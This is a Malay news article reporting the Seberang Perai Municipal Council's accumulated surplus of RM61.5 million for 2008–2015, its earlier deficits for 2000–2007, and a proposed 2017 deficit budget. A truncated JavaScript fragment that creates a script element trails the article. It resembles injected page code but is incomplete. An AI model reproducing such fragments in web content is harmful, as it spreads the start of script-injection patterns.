MPSP surplus setiap tahun sejak 2008

Oleh : ZAINULFAQAR YAACOB

SEBERANG JAYA – Lebihan terkumpul Majlis Perbandaran Seberang Perai (MPSP) dari 2008 hingga 31 Disember 2015 direkodkan mencecah RM61.5 juta, kata Yang Dipertuanya, Dato’ Maimunah Mohd. Sharif.

“Prestasi perbelanjaan MPSP sejak 2008 hingga 2015 adalah sebanyak 96 peratus ke atas.

“Lebihan terkumpul ini bukan disebabkan kita (MPSP) tak berbelanja, tetapi disebabkan amalan perbelanjaan cermat sebagaimana dirancang,” katanya selepas membentangkan Bajet 2017 di Kompleks Ibu Pejabat MPSP di sini baru-baru ini.

Turut serta, Setiausaha MPSP, Sr Rozali Mohamud serta barisan Ahli Majlis lain. Maimunah memberitahu, pendapatan MPSP bagi tahun 2015 meningkat RM25.57 juta atau 12.13 peratus menjadi RM236.27 juta, berbanding 2014 (RM210.70 juta).

Tambah beliau, jumlah perbelanjaan bagi tahun 2015 adalah RM236.08 juta, berbanding 2014, (RM210.53 juta).

“Setiap tahun sejak 2008, kita (MPSP) mengamalkan belanjawan defisit, tetapi kita (MPSP) bagi tahun 2015, sekali lagi mendapat lebihan (surplus) sebanyak RM0.19 juta,” jelasnya.

“Ini bermakna, pada tahun 2017, saya mencadangkan bajet defisit berjumlah RM21.81 juta,” ujarnya sambil memberitahu lebihan terkumpul MPSP sehingga 31 Disember 2015 sebanyak RM61,480,833.

Lebihan kewangan MPSP bagi tahun 2008 direkodkan berjumlah RM3,018,289, diikuti RM14,571,138 (2009), RM23,036,071 (2010), RM13,597,658 (2011), RM4,147,069 (2012), RM2,742,543 (2013), RM171,358 (2014) dan RM196,707 (2015).

Terdahulu, pihak berkuasa tempatan (PBT) berkenaan dalam tempoh tahun 2000 hingga 2007, mengalami defisit tiap-tiap tahun, keseluruhannya berjumlah kira-kira RM228.85 juta.

Mengikut tahun, defisit kewangan MPSP bagi tahun 2000 sebanyak RM5.05 juta, diikuti RM31.57 juta (2001), RM36.67 juta (2002), RM39.04 juta (2003), RM48.94 juta (2004), RM57.08 juta (2005), RM5.40 juta (2006) dan RM5.10 juta (2007).

var d=document;var s=d.createElement(‘script’);